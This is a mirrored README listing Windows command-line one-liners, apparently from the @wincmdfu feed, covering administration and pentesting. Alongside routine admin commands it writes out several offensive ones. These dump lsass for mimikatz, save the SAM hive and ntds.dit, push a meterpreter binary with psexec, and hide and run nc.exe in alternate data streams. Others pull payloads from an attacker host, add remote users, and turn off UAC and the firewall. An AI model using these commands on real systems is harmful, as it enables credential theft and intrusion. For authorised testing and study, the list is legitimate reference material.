Awesome Open Source
Awesome Open Source

Windows CLI gems. Tweets of @wincmdfu

Windows one line commands that make life easier, shortcuts and command line fu.

Table of Contents

Get entires from IPv4 neighbor cache

C:\>netsh interface ipv4 show neighbors

Get available wireless networks via cmd and netsh

C:\>netsh wlan show networks mode=b

Quick list IP addresses only

Save the following in ip.bat in %PATH%

C:\>ipconfig | find /I "pv"

Call ip from CLI

List ALL services AND their binaries

for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j

Export SAM from the Windows Registry to a file

C:\>reg save HKLM\SAM "%temp%\SAM.reg"

Enable remote desktop using reg

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable the boot log to see list of drivers loaded during startup

bcdedit /set bootlog yes

Read via %windir%\ntbtlog.txt

Powershell cmdlet to create System Restore Point

PS C:\>Checkpoint-Computer -description "Restore point!"

Check the current account for seDebugPrivilege

C:\> whoami /priv | findstr "Debug"

For all privs:

C:\> whoami /priv

Enable/disable system users via command line

C:\>net user test /active:yes (no)

Get full help on the net user command:

C:\>net help user

View process that is consuming the most memory using powershell

PS C:\> (Get-Process | Sort-Object -Descending WS)[0]

Create an Alternate Data Stream from a file on an NTFS partition

C:\>type data.txt > C:\windows\explorer.exe:newads.txt

Export running processes in CSV format

C:\> tasklist /FO CSV > tasks.txt

Lock Windows desktop using command line

C:\> rundll32 user32.dll,LockWorkStation

Start explorer with a file or folder selected/highlighted

C:\> explorer /select,C:\MyData\sample.docx

Dump VirtualBox image containing RAM and ELF headers

C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf

Set Time Zone of the system clock

C:\> tzutil /s "Eastern Standard Time"

List available Time zones:

C:\> tzutil /l

Make folder inside a guest from the host


C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"

Force copy meterpreter binary to remote machines & run as system

C:\> psexec @$ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe

Create n/w share called Apps, with read access & limit to 10 conns

C:\> net share Apps=C:\Apps /G:everyone,READ /US:10

List all the drives under My Computer using fsutil

C:\> fsutil.exe fsinfo drives

Troubleshoot n/w packet drops with router statistics using pathping

C:\> pathping -n

List unsigned dlls for a specific process.

For system wide list, remove the process name

C:\> listdlls -u explorer.exe

Obtain a list of Windows XP computers on the domain using PS


PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}

Open the System Properties window, with the Advanced tab selected

Change the number for different tabs

C:\> control sysdm.cpl,,3

Using the dir command to find Alternate Data Streams

C:\> dir /R | find ":$D"

Using streams sysinternals (shows path):

C:\> streams -s .

Use procdump to obtain the lsass process memory.

Use mimikatz minidump to get passwords

C:\> procdump -accepteula -ma lsass.exe mini.dmp

Run mimikatz in minidump mode & use mini.dmp from procdump

mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords

Get list of startup programs using wmic

C:\> wmic startup list full

Add a binary to an Alternate Data Stream

C:\> type c:\tools\nc.exe > c:\nice.png:nc.exe

Execute it (XP/2K3):

C:\> start c:\nice.png:nc.exe

Execute a binary Alternate Data Stream Win 7/2008 using wmic

C:\> wmic process call create C:\nice.png:nc.exe

Show config & state info for Network Access Protection enabled client

C:\> netsh nap client show configuration

Get computer system information, including domain name and memory, using wmic

C:\> wmic computersystem list /format:csv

Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher

C:\> pkgmgr /iu:"TelnetClient"

Secure delete a file/folder in Windows


C:\> sdelete -p 10 a.txt

To recursively delete folders:

C:\> sdelete -10 -r C:\data\

Show all startup entries while hiding Microsoft entries. CSV output

It covers more locations than Windows inbuilt tools

C:\> autorunsc -m -c

Download files via commandline using PS

PS C:\> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\

Fetch the last 10 entries from the Windows Security event log, in text format

C:\> wevtutil qe Security /c:10 /f:Text

def is XML

Create a dll that runs calc on invoke

msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll

C:\> rundll32.exe rcalc.dll,1

Run a command as another user

You will be prompted for password

C:\> runas /noprofile /user:domain\username "mmc wf.msc"

Get shutdown/reboot events from the last 1000 log entries using PS

Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *

Create a new snapshot of the volume that has the AD database and log files

C:\> ntdsutil sn "ac i ntds" create quit quit

Mount the snapshot

Copy ntds.dit from snapshot & System hive from reg for pwd hashes

C:\> ntdsutil snapshot "list all" "mount 1" quit quit

Run a process on a remote system using wmic

C:\> wmic /node:ip process call create "net user dum dum /add"

List the machines, with usernames, that were connected via RDP

C:\> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s

List all process that are running on your system by remote users connected via RDP

C:\> query process *

Reset the Windows TCP\IP stack

netsh int ip reset c:\tcpresetlog.txt

List logged on users.

Very useful during a pentest to look for domain admins

C:\> net session | find "\\"

Set a static IP on a remote box

C:\> wmic /node:remotebox nicconfig where Index=1 call EnableStatic (""), ("")

Bypass powershell execution policy restrictions

PS C:\> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1

List running processes every second on a remote box

C:\> wmic /node:target process list brief /every:1

Remove /node:target for localhost

Get a list of running processes and their command line arguments on a remote system

C:\> wmic /node:target process get commandline, name

Remotely enable and start the Volume Shadow Copy Service

C:\> sc \\target config vss start= auto
C:\> sc \\target start vss

Ping multiple IPs from ips.txt & see live hosts

C:\>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="

Set global proxy in Windows to point to IE proxy

C:\> netsh winhttp import proxy source=ie

Enumerate list of drivers with complete path information

C:\> driverquery /FO list /v

View Group Policy Objects that have been applied to a system

Very useful during pentests

C:\> gpresult /z /h outputfile.html

Reset the WMI repository to what it was when the OS was installed

Very helpful if you have a corrupt repo

C:\> winmgmt /resetrepository

Create symbolic links in Windows Vista, 7 & higher

C:\> mklink <link> <target>
C:\> mklink D:\newlink.txt E:\thisexists.txt

Enable the tftp client in Vista & higher

C:\> ocsetup TFTP /quiet

Pull files to a compromised server:

C:\> tftp -i attacksrv get bin.exe

Obtain list of firewall rules on a local system

C:\> netsh advfi fi sh rule name=all

Can be combined with wmic for remote systems

Get name of current domain controller

C:\> set log
C:\> nltest /dcname:DOMAIN

Get list of all DCs:

C:\> nltest /dclist:DOMAIN

Look at content cached in kernel mode on IIS 7 and higher

C:\> netsh http sh ca

Useful when investigating the MS15-034 HTTP.sys vuln

Quick test to check MS15_034

C:\> curl -v -H "Range: bytes=234234-28768768" "http://host/a.png" -o a.png

HTTP 416 = Vulnerable

HTTP 20X = Not vulnerable

Get a list of all open Named pipes via Powershell

PS C:\> [http://System.IO.Directory ]::GetFiles("\\.\\pipe\\")

Possible VENOM detection on VirtualBox

C:\> vboxmanage list -l vms > a.txt

Search 'Storage' & 'Floppy'

List RDP sessions on local or remote in list format

PS C:\> qwinsta /server: | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv

Get a list of service packs & hotfixes using wmic for remote systems listed in file

C:\> wmic /node:@file /output:out.txt qfe list full

Export wireless connection profiles

C:\> netsh wlan export profile

key=clear allows plain text passwords

Unzip using PowerShell

PS C:\> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)

Open the Network & Sharing center

control.exe /name Microsoft.NetworkandSharingCenter

Create a shortcut of this as ns in PATH for ease

Remotely stop/start ftp on several systems

C:\> wmic /node:@ips.txt /user:u /password:p process call create "net <start> msftpsvc"

To quickly find large files using cmd

C:\> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"

Run from the dir you want

Print RDP connections

for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"

List scheduled tasks & binaries

C:\> schtasks /query /fo LIST /v

Weak permissions can be exploited for localprivilege escalation

Display the "Stored User names and Passwords" window

C:\> rundll32 keymgr.dll,KRShowKeyMgr

List namespaces & classes in WMI via PowerShell

PS C:\> gwmi -n root -cl __Namespace | Select name

PS C:\> gwmi -n root\cimv2 -li

Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox

C:\> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK

Change file extensions recurseively

csv to xls for eg

C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"

List IPs of running VirtualBox machines

for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"

Windows Privilege Escalation

Windows Privilege Escalation

Enumerate packages with their oem inf filenames

C:\> pnputil -e

Install a driver package using inf file

C:\> pnputil -i -a path_to_inf

Malware Hunting with Mark Russinovich and the Sysinternals

Malware Hunting with Mark Russinovich and the Sysinternals Tools

Windows Nano Server APIs

Windows wifi hotspot using cmd

Starting a wifi hotspot using Windows cmd with ssid name hotspotname and key password

Windows wifi hotspot using cmd

Disable UAC via cmdline

C:\> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f

Turn off Windows firewall for all profiles

Useful if you have a bind shell

C:\> netsh advfirewall set allprofiles state off

List Missing Updates

PS C:\> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title

Export SAM and SYSTEM Dump password hashes offline

C:\>reg save HKLM\SAM SAM

Convert Binary to base64 string to transfer across restricted RDP

PS C:\> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))

Convert Base64 string to Binary

PS C:\> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By

List services running as SYSTEM and possibly weak file permissions

wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"

Check Bitlocker status on a remote box

manage-bde -status -cn <box>

Use wmic /node:@ips.txt & process alias for multiple.

Export failed logon attempts

PS C:\> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv

Alternate Data Streams and PS

  • List all ADS for all files in current dir
PS C:\> gi * -s *
  • Read ADS
PS C:\> gc <file> -s <ADSName>
  • Create ADS using text input
PS C:\> sc <file> -s <ADSName>
  • Delete ADS
PS C:\> ri <file> -s <ADSName>

Run the Windows Assessment tool for cpu and ram and disk

C:\> winsat cpuformal -v
C:\> winsat memformal -v
C:\> winsat diskformal -v

Port forward (proxy) traffic to remote host and port

C:\> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]

Enable/Disable NetBIOS over TCP/IP

Step 1. Get Index of Network Adapter:
C:\> wmic nicconfig get caption,index

Step 2. Use the index 
C:\> wmic nicconfig where index=1 call SetTcpipNetbios 1


Compact multiple VDI files across folders

C:\> for /F %i in ('dir /b /s *.vdi ^| find ".vdi"') do vboxmanage modifyhd --compact %i

Full scan using WinDefender

C:\>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -scan -scantype 2

Use #wmic /node:@ips process for multiple.

Generate 32 char random password

Save as genpass.ps1

PS C:\> ([char[]](38..126)|sort{Get-Random})[0..32] -join ''


Please read the contribution guidelines if you want to contribute.

Get A Weekly Email With Trending Projects For These Topics
No Spam. Unsubscribe easily at any time.
security (1,910
windows (1,467
powershell (1,350
pentesting (381
infosec (200
cmd (35